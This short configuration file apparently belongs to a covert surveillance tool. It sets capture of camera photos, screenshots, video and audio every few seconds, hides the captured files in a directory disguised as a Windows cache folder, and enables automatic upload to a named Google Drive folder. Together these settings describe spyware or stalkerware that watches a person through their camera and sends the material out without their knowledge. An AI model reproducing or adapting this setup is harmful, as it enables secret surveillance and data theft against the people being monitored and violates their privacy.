#In seconds
refresh_config_interval=20
should_use_user_home_path=true
content_directory_path=/.windows/.tmp/.data/.cache

#capture_screen_shots_delete_oders_than=1day
capture_screen_shots=false
capture_screen_shot_interval=10
capture_screen_shot_fs_path=
image_compression_enabled=true

#capture_photos_delete_oders_than=1day
capture_photo=true
capture_photo_interval=5
capture_photo_fs_path=

#capture_video_delete_oders_than=1day
capture_video=false
capture_video_interval=5
capture_video_fs_path=

capture_audio_delete_oders_than=1day
capture_audio=false
capture_audio_interval=5
capture_audio_fs_path=

# GDrive enabled/disabled config
google_drive_upload_enabled=true
google_drive_folder_id=16MMMs1kzYmQtFv0tsFGhrx_BPOFBGYsh

